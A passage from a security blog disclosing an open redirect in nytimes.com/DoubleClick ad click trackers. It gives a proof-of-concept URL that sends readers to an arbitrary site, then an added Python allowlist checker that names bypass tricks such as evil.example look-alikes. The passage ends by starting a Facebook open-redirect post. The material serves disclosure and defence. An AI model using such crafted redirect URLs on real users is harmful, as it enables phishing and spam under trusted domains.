<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3Fhttp%3A%2F%2Ffacebook%2Ecom%2Fall%2Dinclusive%2Ephp%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion" style="background-color: white;" target="_blank">http://www.nytimes.com/adx/<wbr></wbr>bin/adx_click.html?type=goto&<wbr></wbr>opzn&page=www.nytimes.com/<wbr></wbr>pages/nyregion/index.html&pos=<wbr></wbr>SFMiddle&sn2=8dfce1f6/<wbr></wbr>9926f9b3&sn1=bbba504f/<wbr></wbr>c0de9221&camp=CouplesResorts_<wbr></wbr>1918341&ad=NYRegionSF_Feb_<wbr></wbr>300x250-B5732328.10663001&<wbr></wbr>goto=http%3A%2F%2Fad%<wbr></wbr>2Edoubleclick%2Enet%2Fddm%<wbr></wbr>2Fclk%2F279541164%3B106630011%<wbr></wbr>3Bs%3Fhttp%3A%2F%2Ffacebook%<wbr></wbr>2Ecom%2Fall%2Dinclusive%2Ephp%<wbr></wbr>3Futm%5Fsource%3Dnyt%26utm%<wbr></wbr>5Fmedium%3Ddisplay%26utm%<wbr></wbr>5Fcontent%3Dclicktracker%<wbr></wbr>26utm%5Fcampaign%3D300x250%<wbr></wbr>5FExpectMore%5FNYT%5FNYRegion</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3Fhttp%3A%2F%2Ftetraph%2Ecom%2Fsecurity%3F%2Dinclusive%2Ephp%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion" style="background-color: white;" target="_blank">http://www.nytimes.com/adx/<wbr></wbr>bin/adx_click.html?type=goto&<wbr></wbr>opzn&page=www.nytimes.com/<wbr></wbr>pages/nyregion/index.html&pos=<wbr></wbr>SFMiddle&sn2=8dfce1f6/<wbr></wbr>9926f9b3&sn1=bbba504f/<wbr></wbr>c0de9221&camp=CouplesResorts_<wbr></wbr>1918341&ad=NYRegionSF_Feb_<wbr></wbr>300x250-B5732328.10663001&<wbr></wbr>goto=http%3A%2F%2Fad%<wbr></wbr>2Edoubleclick%2Enet%2Fddm%<wbr></wbr>2Fclk%2F279541164%3B106630011%<wbr></wbr>3Bs%3Fhttp%3A%2F%2Ftetraph%<wbr></wbr>2Ecom%2Fsecurity%3F%<wbr></wbr>2Dinclusive%2Ephp%3Futm%<wbr></wbr>5Fsource%3Dnyt%26utm%5Fmedium%<wbr></wbr>3Ddisplay%26utm%5Fcontent%<wbr></wbr>3Dclicktracker%26utm%<wbr></wbr>5Fcampaign%3D300x250%<wbr></wbr>5FExpectMore%5FNYT%5FNYRegion</a></span></div>
</div>
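<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">The POC above reaches its final page through two chained click trackers: the nytimes.com adx_click.html <code>goto</code> parameter forwards to a DoubleClick /ddm/clk/ URL, and everything after that URL's first "?" is the landing page, so swapping facebook.com for tetraph.com in the innermost segment sends the reader to an arbitrary site under a nytimes.com link. The Python below is an added example, not code from the original post or from nytimes.com or DoubleClick: it rebuilds both URLs from the post's POC (constructed copies, with the tracking parameters trimmed), walks the redirect chain, and applies the check a click tracker should make before issuing its redirect, an exact-host allowlist on the final landing page. The two redirector shapes it models and the allowlist contents are assumptions for the example.</span></div>

```python
"""Walk the redirect chain behind a nytimes.com ad click and allowlist its landing host.

Added example (not code from the original post or from nytimes.com / DoubleClick).
It models the two redirector shapes seen in the post's POC; the hostnames it
treats as trackers and the allowlist below are assumptions for this example.
"""
from urllib.parse import parse_qs, quote, urlsplit

NYT_TRACKER = "http://www.nytimes.com/adx/bin/adx_click.html"
DCLK_TRACKER = "http://ad.doubleclick.net/ddm/clk/279541164;106630011;s"

# Landing hosts the ad campaign is registered for (assumption for this example).
ALLOWED_LANDING_HOSTS = {"facebook.com", "www.facebook.com"}


def tracker_url(goto):
    """Build a nytimes-style click URL whose `goto` carries the given target.

    quote(safe="") percent-encodes every reserved character, which is what the
    post's POC does by hand (%3A, %2F, %3F, %3B, ...).
    """
    return NYT_TRACKER + "?type=goto&pos=SFMiddle&goto=" + quote(goto, safe="")


# Constructed copies of the post's two URLs: the legitimate ad click and the POC
# in which the DoubleClick target was swapped for an arbitrary site.
AD_URL = tracker_url(DCLK_TRACKER + "?http://facebook.com/all-inclusive.php?utm_source=nyt")
POC_URL = tracker_url(DCLK_TRACKER + "?http://tetraph.com/security?-inclusive.php?utm_source=nyt")


def next_hop(url):
    """Return the URL a redirector hop forwards to, or None for a landing page.

    nytimes adx_click.html: target is the `goto` query parameter (first value).
    DoubleClick /ddm/clk/...: target is everything after the first '?'.
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if (host == "nytimes.com" or host.endswith(".nytimes.com")) and parts.path.endswith("/adx_click.html"):
        return parse_qs(parts.query).get("goto", [None])[0]
    if (host == "doubleclick.net" or host.endswith(".doubleclick.net")) and parts.path.startswith("/ddm/clk/"):
        return parts.query or None
    return None


def redirect_chain(url, max_hops=5):
    """List every hop from `url` to the final landing page (bounded to avoid loops)."""
    chain = [url]
    while len(chain) <= max_hops:
        target = next_hop(chain[-1])
        if target is None:
            break
        chain.append(target)
    return chain


def landing_host(url):
    """Host name of the page the user actually ends up on."""
    return (urlsplit(redirect_chain(url)[-1]).hostname or "").lower()


def is_safe_click(url, allowed_hosts=ALLOWED_LANDING_HOSTS):
    """The check a click tracker should apply before issuing its redirect.

    The *final* landing page must be http(s) and its exact host must be on the
    campaign's allowlist. Exact matching rejects facebook.com.evil.example,
    urlsplit().hostname discards userinfo tricks such as facebook.com@evil.example,
    and the scheme check rejects scheme-relative //evil.example targets.
    """
    landing = urlsplit(redirect_chain(url)[-1])
    if landing.scheme not in ("http", "https"):
        return False
    return (landing.hostname or "").lower() in allowed_hosts


if __name__ == "__main__":
    for label, url in (("ad", AD_URL), ("poc", POC_URL)):
        print(label, "->", " -> ".join(redirect_chain(url)))
        print("   landing host:", landing_host(url), "safe:", is_safe_click(url))
```

<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">Running the block prints both chains; the check rejects the POC because the final host is tetraph.com, and also rejects scheme-relative targets (//evil.example), userinfo tricks (facebook.com@evil.example) and suffix look-alikes (facebook.com.evil.example) that a substring or endswith() test on the URL would let through. The same allowlist belongs in the DoubleClick hop, since each redirector in the chain is responsible for the target it forwards to.</span></div>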
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">More Details:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Video:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.youtube.com/watch?v=3XtrUqzxNW0" style="background-color: white;" target="_blank">https://www.youtube.com/watch?<wbr></wbr>v=3XtrUqzxNW0</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Blog:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://computerobsess.blogspot.com/2014/11/nytimes-covert-redirect-vulnerability.html" style="background-color: white;" target="_blank">http://computerobsess.<wbr></wbr>blogspot.com/2014/11/nytimes-<wbr></wbr>covert-redirect-vulnerability.<wbr></wbr>html</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">These vulnerabilities were reported to Google earlier in 2014, but it seems that Google has not yet taken any action. All of the vulnerabilities are still unpatched.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">Related Posts:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://seclists.org/fulldisclosure/2014/Nov/28"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2014/Nov/28</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://cxsecurity.com/issue/WLB-2014110106"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">https://cxsecurity.com/issue/WLB-2014110106</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1192">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1192</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01307.html"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01307.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://computerobsess.blogspot.com/2014/11/google-doubleclicknetadvertising-system.html"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://computerobsess.blogspot.com/2014/11/google-doubleclicknetadvertising-system.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><a href="http://www.techenet.com/2014/12/doubleclick-do-google-pode-ser-vulneravel-a-ataques/">http://www.techenet.com/2014/12/doubleclick-do-google-pode-ser-vulneravel-a-ataques/</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://computertechhut.wordpress.com/2014/11/12/google-doubleclick-spam/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://computertechhut.wordpress.com/2014/11/12/google-doubleclick-spam/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://mathpost.tumblr.com/post/120760828940/tetraph-google-doubleclick-net-advertising"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://mathpost.tumblr.com/post/120760828940/tetraph-google-doubleclick-net-advertising</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><a href="http://tetraph.com/security/open-redirect/google-doubleclick-netadvertising-system-url-redirection-vulnerabilities-can-be-used-by-spammers/" target="_blank">http://tetraph.com/security/<wbr></wbr>open-redirect/google-<wbr></wbr>doubleclick-netadvertising-<wbr></wbr>system</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://www.facebook.com/essayjeans/posts/838922772865543"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/essayjeans/posts/838922772865543</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://plus.google.com/u/0/+essayjeans/posts/Y12x6gXfyFX"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://plus.google.com/u/0/+essayjeans/posts/Y12x6gXfyFX</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://mathstopic.blogspot.com/2015/06/google-doubleclick-spam.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://mathstopic.blogspot.com/2015/06/google-doubleclick-spam.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://itsecurity.lofter.com/post/1cfbf9e7_72fe79f"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://itsecurity.lofter.com/post/1cfbf9e7_72fe79f</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://twitter.com/essayjeans/status/606726247578636288"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://twitter.com/essayjeans/status/606726247578636288</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://tetraph.tumblr.com/post/120760676767/google-doubleclick-net-advertising-system-url"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.tumblr.com/post/120760676767/google-doubleclick-net-advertising-system-url</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://itinfotechnology.wordpress.com/2014/11/18/google-doubleclick-spam/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://itinfotechnology.wordpress.com/2014/11/18/google-doubleclick-spam/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/permalink.php?story_fbid=945171075538075&id=874373602617823">https://www.facebook.com/permalink.php?story_fbid=945171075538075</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://guyuzui.lofter.com/post/1ccdcda4_7305f25"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://guyuzui.lofter.com/post/1ccdcda4_7305f25</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><a href="http://tetraph.blog.163.com/blog/static/23460305120155534216326/">http://tetraph.blog.163.com/blog/static/23460305120155534216326/</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/spamming/google-doubleclick-spam/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/spamming/google-doubleclick-spam/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-55809968514787657122015-06-04T21:55:00.000-07:002015-06-04T21:55:01.897-07:00Facebook Old Generated URLs Still Vulnerable to Open Redirect Attacks & A New Open Redirect Web Security Bugs<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRMCAL42Kzk81-PAZ3_OC_Pg8N0DPCIypHTkh6FzLyd2Y3ZOqlnd-ZAS4WjhLNkRKIaMWdnH_Rin7HbzqNuGFQR9TPpfU_BxH1wNOEckqOrmdqnT8I67p6Ss2EaWbmgMBpXevdbnhw64PI/s1600/Facebook_2482983b.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRMCAL42Kzk81-PAZ3_OC_Pg8N0DPCIypHTkh6FzLyd2Y3ZOqlnd-ZAS4WjhLNkRKIaMWdnH_Rin7HbzqNuGFQR9TPpfU_BxH1wNOEckqOrmdqnT8I67p6Ss2EaWbmgMBpXevdbnhw64PI/s400/Facebook_2482983b.jpg" width="400" /></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Facebook Old Generated URLs Still Vulnerable to Open Redirect Attacks & A New Open Redirect Web Security Bugs</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Domain:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.facebook.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">"Facebook
is an online social networking service headquartered in Menlo Park,
California. Its website was launched on February 4, 2004, by Mark
Zuckerberg with his college roommates and fellow Harvard University
students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris
Hughes. The founders had initially limited the website's membership to
Harvard students, but later expanded it to colleges in the Boston area,
the Ivy League, and Stanford University. It gradually added support for
students at various other universities and later to high-school
students. Since 2006, anyone who is at least 13 years old is allowed to
become a registered user of the website, though the age requirement may
be higher depending on applicable local laws. Its name comes from a
colloquialism for the directory given to it by American universities
students." (Wikipedia)</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"Facebook
had over 1.44 billion monthly active users as of March 2015.Because of
the large volume of data users submit to the service, Facebook has come
under scrutiny for their privacy policies. Facebook, Inc. held its
initial public offering in February 2012 and began selling stock to the
public three months later, reaching an original peak market
capitalization of $104 billion. As of February 2015 Facebook reached a
